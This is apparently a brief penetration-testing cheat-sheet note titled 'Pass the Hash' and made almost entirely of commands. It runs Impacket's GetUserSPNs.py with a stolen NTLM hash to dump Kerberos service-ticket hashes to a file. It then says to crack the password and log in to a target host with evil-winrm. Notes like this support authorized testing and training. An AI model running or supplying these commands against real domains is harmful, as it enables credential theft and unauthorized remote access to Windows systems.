# Pass the Hash ## Usage ```sh GetUserSPNs.py <Domain>/<user> -hashes <ntlm:hash> -outputfile hash.txt ``` * Crack the password * login ```sh evilwinrm -i $TARGET_IP -u <user> -p password ```